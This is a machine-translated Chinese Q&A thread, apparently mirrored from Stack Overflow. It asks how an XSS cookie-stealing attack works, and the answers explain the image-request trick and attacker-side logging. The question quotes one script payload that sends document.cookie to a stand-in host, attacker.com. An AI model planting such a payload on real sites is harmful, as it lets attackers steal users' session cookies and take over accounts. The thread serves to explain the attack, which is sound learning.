2010-04-12 80 views
1

的:问题从<a href="http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt" rel="nofollow noreferrer">http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt</a>援引型XSS攻击


如同这里许多可能知道,目前的XSS攻击通常有两种形式: 1 - 攻击者上传标签公共bulliten板,博客,或其他网站 有XSS漏洞,并有很多其他用户将访问。攻击者通常 收成后用户模仿网站的Cookie,但表单提交和其他攻击 有时利用。这就是我所说的许多人认为XSS是。 下面是一个例子:

有人将张贴在evilblog.com以下,其他用户将处理

<script>document.write("<img src=http://attacker.com/” + document.cookie + “>”)</script> 

这将尽量拉的图像攻击者的服务器与用户的evilblog cookies在URL 。


我的问题:

我不明白上面被写图像URL路径的目的/结果。任何人都可以详细说明这一点吗?

PS:这是什么意思为“这会尽量拉的图像攻击者的服务器的URL用户的evilblog曲奇”

回答

2

执行document.write()只是增加了一个img标签的网站,浏览器将尝试从URL加载图像。

脚本和框架时,他们来自不同的领域有时会堵塞这样的XSS攻击会在这种情况下失败。图像通常是允许的,因为许多网站无论如何都显示来自不同主机的图像,所以XSS攻击将成功。

结果是攻击者的条目记录包含Cookie信息,并且因为它通常没有返回它解释为一个残缺的图像所以大多数浏览器显示任何与用户不会怀疑什么。

+0

关于使用图像的透彻解释。谢谢。 – Ricky 2010-04-12 11:17:48

1

的目的是,图像会自动被浏览器获取的;在示例中,cookie的详细信息在查询字符串中设置为该URL,因此攻击者获取URL,获取cookie,从而获取身份验证所需的详细信息。

+0

所以“attacker.com”是指对被攻击? – Ricky 2010-04-12 11:10:39

+1

@Ricky:不,“attacker.com”是攻击者控制的网站。因此,他们将检查其网站的HTTP日志,并在那里查看该请求的详细信息(即*他们的*网站上)。 – 2010-04-12 11:12:06

1

简单。它向请求的URL中包含cookie的恶意域发起请求。

相关问题